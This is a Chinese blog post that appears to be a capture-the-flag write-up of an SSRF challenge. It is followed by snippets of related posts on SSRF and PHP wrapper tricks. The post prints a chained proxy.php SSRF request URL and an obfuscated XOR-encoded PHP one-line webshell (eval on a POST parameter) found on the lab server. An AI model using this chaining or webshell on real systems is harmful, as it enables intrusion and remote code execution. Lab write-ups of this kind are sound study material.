FUN SSRF

最新推荐文章于 2024-06-29 11:12:57 发布
最新推荐文章于 2024-06-29 11:12:57 发布
阅读量328 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctfweb ssrf 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u013457794/article/details/89161821

2019年4月9日19:20:11

URL: http://web.jarvisoj.com:32782/

一,试探

上来就看源代码,看有没有提示:

注意第7行,有一个url跳转,但是暂时还不知道怎么用

接着点击第9行"admin",看到/admin网页源代码:

注意第9行,提示admin的ip是202.5.19.128

接着去这个网站上逛了一下,没发现什么

猜测题意想要我们用admin的ip来访问这个网站的/admin,可是该如何做到呢?网络代理不太好弄啊。

二,深入

这时候不能忽略了index网页的提示

<img src="proxy.php?url=http://dn.jarvisoj.com/static/images/proxy.jpg" alt="">

proxy.php的作用就像是一个跳板,我们可以尝试用它去访问别的网页,比如 www.baidu.com:

成功了,而且还通过Notice得到了网站根目录

可是我们需要的是利用admin的ip再来访问本站才行,于是大胆猜测admin的服务器上会不会也有一个proxy.php

三,攻坚

有了想法就立即尝试:

http://web.jarvisoj.com:32782//proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/

果不其然,访问成功,并且主页还有提示

有提示,说明路没走错,接着下一步呢,有点茫然,当没有已知条件的时候,就去创造已知条件,比如扫后台,很容易在/admin/下找到robots.txt

User-agent: *
Disallow:trojan.php
Disallow:trojan.php.txt

顺势访问 trojan.php.txt

<?php ${("#"^"|").("#"^"|")}=("!"^"`").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");${("#"^"|").("#"^"|")}(("-"^"H"). ("]"^"+"). ("["^":"). (","^"@"). ("}"^"U"). ("e"^"A"). ("("^"w").("j"^":"). ("i"^"&"). ("#"^"p"). (">"^"j"). ("!"^"z"). ("T"^"g"). ("e"^"S"). ("_"^"o"). ("?"^"b"). ("]"^"t"));?>

发现是个一句话木马,估计就是trojan.php的内容,把这个脚本在本地跑一下就能发现是 eval($_POST(360));

然后用hackbar对trojan.php POST 360=1,就看到flag跳出来了

ctf 监听端口_SSRF 漏洞分析与利用(含 CTF 例题)
weixin_33404919的博客
01-13 1788
原标题:SSRF 漏洞分析与利用(含 CTF 例题)16004488 总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的。 一、漏洞产生以curl为例,漏洞代码为ssrf.php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOC...
SSRF 漏洞记录
热门推荐
发哥微课堂
04-02 1万+
0x00:漏洞原理 SSRF(Server-Side Request Forgery)也属于应用层上的一个漏洞类型,用一个最简单的例子来理解这个漏洞:比如一个添加图文的功能,填入标题内容和封面图然后提交在网站前台显示,对于这个功能的图片它除了可以让你上传以外,还支持填入远程图片地址,如果你填入了远程的图片地址,则该网站会加载远程图过来进行显示,而如果程序写法不严谨或者过滤不严格,则加载图片地址的...
SSRF 漏洞的寻找
WHACKW的专栏
01-04 5733
SSRF 漏洞的寻找 一、从WEB功能上寻找 我们从上面的概述可以看出,SSRF是由于服务端获取其他服务器的相关信息的功能中形成的,因此我们大可以列举几种在web 应用中常见的从服务端获取其他服务器信息的的功能。 1)分享:通过URL地址分享网页内容 早期分享应用中,为了更好的提供用户体验,WEB应用在分享功能中,通常会获取目标URL地址网页内容中的标签或者标签中content的文本内容作
SSRF 基础介绍
the_biggest_baby的博客
06-02 900
SSRF,服务端请求伪造,英文全称 Server-side Request Forgery,是 web 服务端漏洞的一种,允许攻击者执行未授权的行为或访问内网服务、敏感数据等。今天我们一起来学习下 SSRF 吧。
ssrf漏洞原理
qq_44713013的博客
12-28 2690
0x01 漏洞原理 SSRF(Server-Side Request Forgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。 由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。 最常见的例子:攻击者传入一个未经验证的URL,后端代码直接请求这个URL,就会造成SSRF漏洞。 0x02 漏洞危害 对服务器所在的内网进行端口扫描,获取一些服务的banner信息等 攻击运行在内网
SSRF一篇文章实战举例全面学懂
书山有路勤为径,学海无涯苦作舟
06-29 1302
上面这篇文章真的写的很好,是目前看过最好的将SSRF(服务端请求伪造)和Gopher协议的内容。然后这种题型,我记得在之前的文章,金砖里有个云启的练习,用的就是SSRF漏洞+file协议,呜呜呜那时候还不知道是啥。现在回首原来如此。
CSRF及SSRF漏洞
weixin_46962006的博客
12-09 1174
                       CSRF及SSRF漏洞 目录前言CSRF原理例子触发条件实操防御RefererToken使用地点SSRF简介SSRF漏洞挖掘SSRF用途SSRF简单代码漏洞利用漏洞绕过漏洞防护Cookie验证实例Session验证实例Session配置(php.ini)Session_start详解Session变量销毁Session实例Token验证实例验证登录总结 前言        个人观点,若有误请指教 CSRF 原理 CSRF(Cross-site request
案例研究-SSRF+DNS rebinding【$5000】
the_biggest_baby的博客
06-06 1371
分享一篇 HackerOne 上一篇赏金 5000$ 的 DNS rebinding(重新绑定)绕过 ssrf 的报告的学习记录。Hacking for fun!
php4fun第一题,2018网鼎杯第四场Web题解
weixin_42432918的博客
03-21 355
Webcomment题目界面如下,有发帖留言的功能,不过需要登录才能使用。可以通过爆破得知账号密码为:zhangwei/zhangwei666手工测试发现存在 .git 泄露,用 GitHack 下载泄露文件,发现 write_do.php 的代码不全。通过 git cat-file -p xxxxx 命令显示版本库对象的内容、类型及大小信息,可以看到完整的代码:具体代码如下:可以看到上面 第13...
[NISACTF 2022]
snowlyzz的博客
09-09 6485
NISACTF部分WP
文件包含做题做题复现及方法总结
2301_80105510的博客
03-11 1701
pos(localeconv())得到点号,因为scandir(’.’)表示得到当前目录下的文件,所以scandir(pos(localeconv()))就能得到flag.php了。实验结果证明了以上的论述,要想绕过这个“黑洞“,需要往里面传入两个参数,shell会执行第一个参数,将第二个参数带入到黑洞,上图实验最后一条语句也证明了这个论述。但是过滤了flag,传入flag.php是行不通的,这时候可以使用data://text/plain,c=tac flag.php%26%26ls或?
安恒周周练西湖论剑版web美男子题:巧用group by with rollup
young9222的博客
04-08 2729
安恒周周练西湖论剑版web美男子题:巧用group by with rollup 2019年4月8日15:49:30 ###源码:### <?php include ‘global.php’; function AttackFilter($StrKey,$StrValue,$ArrReq){ if(is_array($StrValue)) { $S...
PythonServer-Flask-Pin码攻击
young9222的博客
04-03 2426
一道有关Flask开启DEBUG结合任意文件读取生成PIN码攻击的题目。可惜没有及时截图,现在只剩下文字了,凑合记录一下。 正常注册用户,登陆用户,查看源代码发现在打开图片时,图片名由base64编码 利用其解析base64的漏洞,进行目录穿越,例如对“…/…/…/…/etc/passwd"进行base64编码后查看响应包获得文件内容 由于存在文件读取漏洞,所以可以依次读取: u...
利用正则回溯最大次数上限进行绕过
young9222的博客
04-04 1660
源码: <?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is', $data); } if(empty($_FILES)) { die(show_source(__FILE__)); } $user_dir = 'data/' . md5($_SERVER...
利用文件操作函数结合PHP伪协议RCE
young9222的博客
04-04 1215
获得源码:http://ip:port/?read-source=1 <?php if(isset($_GET['read-source'])) { exit(show_source(__FILE__)); } define('DATA_DIR', dirname(__FILE__) . '/data/' . md5($_SERVER['REMOTE_ADDR']));...
利用Opcache缓存RCE以及"/."trick
young9222的博客
04-04 686
2019年3月21日10:20:01 今天对于昨天的《PHP代码审计练习》中第三题"php/."有了新的理解,我使用的方法其实是非预期解,正解是利用opcache覆盖index.php,而不是利用php底层问题来覆盖index.php ...
HPP结合PHP解析URL特性的SQL注入题目
young9222的博客
04-03 653
看到URL中有:index.php?file=CN 要有利用伪协议的思路: php://filter/read=convert.base64-encode/resource=index 再结合dirbuster扫描后台得出waf,function,index,config,global,content多个php,了解了该网站的WAF策略: #function.php <?php in...
N1CTF web eatcms
young9222的博客
04-04 579
Do it! 对服务器后台扫描发现有注册,登陆等等界面,注册好账号后登陆发现url中有page=guest 于是尝试使用php://filter/read=convert.base64-encode/resource=index查看源代码,发现顺藤摸瓜可获得index.php,function.php,config.php的源码其中function.php中有对重定向的源码: function ...
简单的三道Sqli习题
young9222的博客
04-03 564
简单的三道Sqli习题 2019年3月14日14:35:27 Q1. Login as admin 0 Q2. Login as admin 1 Q3. 学生成绩查询 一、Login as admin 0 URL:https://hackme.inndy.tw/login0/ 本题只有一个登陆页面,并且可以查看源码,源码中把过滤方法和sql语句以及表的字段都告诉了我们: 过滤: functio...
ssrf
最新发布
03-08
### SSRF漏洞原理 服务器端请求伪造(SSRF)是一种Web安全漏洞,允许攻击者诱导服务器端应用程序向攻击者选择的任意域发出HTTP请求[^2]。这种类型的攻击通常发生在当应用接受来自用户的输入并使用该输入来构建用于发起网络请求的URL时。 #### 常见场景与影响 - **内部服务访问**:由于服务器可能位于防火墙后面,拥有对内网资源的访问权限,因此通过SSRF可以绕过外部网络限制,获取本应无法触及的数据或接口。 - **云元数据泄露**:许多云计算平台提供可通过特定IP地址(如`169.254.169.254`)访问的服务实例配置信息,这成为了一种常见的SSRF目标。 ```python import requests def fetch_data(url): response = requests.get(url) # 如果url由用户控制,则存在SSRF风险 return response.text ``` 上述代码片段展示了潜在的风险点——如果`fetch_data()`函数中的参数`url`是由未经验证的用户输入提供的,那么就可能存在SSRF漏洞[^1]。 ### 防御措施 为了防止SSRF的发生,建议采取以下策略: - **白名单机制**:仅允许访问预定义的安全域名列表内的资源,拒绝其他所有请求。 - **协议限制**:确保只支持必要的协议(通常是HTTP/HTTPS),阻止FTP或其他不常用协议的调用。 - **相对路径处理**:对于需要动态生成的目标链接,考虑采用相对路径而非绝对路径的方式实现功能需求。 - **响应内容过滤**:即使执行了对外部系统的查询操作,在返回给前端之前也要仔细审查和净化接收到的信息,以防其中含有恶意载荷。 - **最小化权限原则**:运行应用程序的服务账户应当遵循最低特权原则,减少因遭受此类攻击而导致更大范围损害的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值